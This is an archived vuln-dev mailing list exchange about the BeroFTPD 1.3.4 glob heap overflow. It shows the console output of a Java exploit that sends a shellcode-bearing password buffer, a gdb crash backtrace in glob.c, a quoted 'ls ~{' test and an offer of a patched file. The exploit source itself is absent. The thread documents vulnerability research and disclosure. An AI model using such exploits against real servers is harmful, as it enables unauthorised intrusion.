re: Older BeroFTPD glob

[KF <dotslash () snosoft com>]

In eduardos reply I did not find it clear that BeroFTPD 1.3.4 was or was 
not vuln by default compile.  I compiled it from the latest source on 
the wu-ftpd.org ftp server. Bare with no patches I get the following 
result... which was the same with earlier versions. Again I am on a ppc 
linux box:

[root@ibook root]# java wuwarez 42424242 0 localhost anonymous
Shellcode is 44 bytes long
return is 42424242
Got Socket
Sleeping so that you can attach a debugger
220 ibook FTP server (BeroFTPD 1.3.4(2) Mon Dec 1 23:09:32 EST 2003) ready.
Sending username
331 Guest login ok, send your complete e-mail address as password.
sending mal buffer as the passwd
ÿüÿþ;230 Guest login ok, access restrictions apply.
Populate Heap...needs more work
(program exit)
[root@ibook root]#

(This is what we saw when we attached the debugger)

[root@ibook src]# ps -ef | grep ftpd
ftp       2035   790  0 14:55 ?        00:00:00 ftpd: 
localhost.localdomain: anonymous
[root@ibook src]# gdb ./ftpd  2035
Program received signal SIGSEGV, Segmentation fault.
0xfeb6cfc in free () from /lib/libc.so.6
(gdb) bt
#0  0xfeb6cfc in free () from /lib/libc.so.6
#1  0x10010b58 in blkfree (av0=0x42424242) at glob.c:604  
#2  0x1000dd04 in yyparse () at ftpcmd.y:1246
#3  0x10002cac in main (argc=268566528, argv=0x7ffffc74, 
envp=0x1003e828) at ftpd.c:1221
#4  0xfe5e308 in __libc_start_main () from /lib/libc.so.6

Detaching from program: /root/BeroFTPD-1.3.4/src/./ftpd, Pid 2035

-KF


From: "Eduardo Cruz" <eduardo.cruz () tsg com> <mailto:eduardo.cruz () tsg com>
Date: Sun Dec 09, 2001  05:00:10 AM US/Pacific
To: "KF" <dotslash () snosoft com> <mailto:dotslash () snosoft com>, 
<vuln-dev () security-focus com> <mailto:vuln-dev () security-focus com>
Subject: Re: Older BeroFTPD glob

Connected to localhost.
220 cimitarra FTP server (BeroFTPD 1.3.4(1) Wed May 30 18:22:32 CEST 2001)
ready.
Name (localhost:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user!  This is an experimental FTP server.  If have 
any
230-unusual problems, please report them via e-mail to root@cimitarra 
<mailto:root@cimitarra>
230-If you do have problems, please try using a dash (-) as the first
character
230-of your password -- this will turn off the continuation messages that
may
230-be confusing your ftp client.
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{
200 PORT command successful.
550 Missing }
ftp>

just patch glob.c ur self, or use the mine already patched (attached).
And about the maintenance of beroftp, as far as i know is not being done
since years ago.
Anyway appart from the bugs derivating from vuftpd i dont see the point on
maintaining bero, i find it quite perfect like it is.

have fun